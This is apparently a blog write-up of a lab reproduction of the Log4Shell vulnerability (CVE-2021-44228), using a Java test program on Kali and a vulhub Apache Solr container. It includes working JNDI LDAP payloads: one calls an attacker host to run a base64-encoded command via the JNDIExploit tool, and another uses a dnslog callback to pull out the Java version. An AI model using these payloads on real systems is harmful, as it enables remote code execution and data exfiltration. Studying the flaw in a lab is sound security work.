Preface: The conditions for using Log4j are really harsh. After watching a lot of videos and articles, I recorded two scenarios that I can reproduce.
For some reason, the Windows system has no response for a long time, and can only print on the console. 360 has detected Log4j, but even if you exit 360, there is no command execution, which is far from the big picture
1、kali
- Java environment: 1.8.0_281, this jdk version is already very high, the real environment cannot be reproduced, the core lies in
System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase","true"); - Download two jar packages, log4j-core-2.14.1.jar, log4j-api-2.14.1.jar
// Log4jTest.java
import org.apache.logging.log4j.LogManager;
import org.apache.logging.log4j.Logger;
public class Log4jTest {
private static final Logger logger = LogManager.getLogger();
public static void main(String[] args) {
System.setProperty("com.sun.jndi.ldap.object.trustURLCodebase","true");
String jndi_exploit = "${jndi:ldap://192.168.137.1:1389/Basic/Command/Base64/dG91Y2ggL3RtcC9zdWNjZXNzCg==}";
logger.error(jndi_exploit);
}
}
Compile and run
javac -cp log4j-core-2.14.1.jar:log4j-api-2.14.1.jar:$CLASSPATH Log4jTest.java
java -cp log4j-core-2.14.1.jar:log4j-api-2.14.1.jar:$CLASSPATH Log4jTest
Attacker host ip (192.168.137.1), use the JNDIexploit tool to attack,
java8 -jar JNDIExploit-1.4-SNAPSHOT.jar -i 192.168.137.1
2、vulhub
vulhub, creating containers for CVE-2021-44228
This environment is very harmonious, without any problems, a one-time success
Because log4j is not a separate web service, but a logging library, this environment is Apache Solr 8.11.0, which use Log4j 2.14.1
After the service starts, visit http://your-ip:8983to see the admin portal of Apache Solr.
/solr/admin/cores?action=${jndi:ldap://${sys:java.version}.hw5t79.dnslog.cn}
If you check the records on the dnslog platform, you can see
that I am using java8u74, and the information has been taken out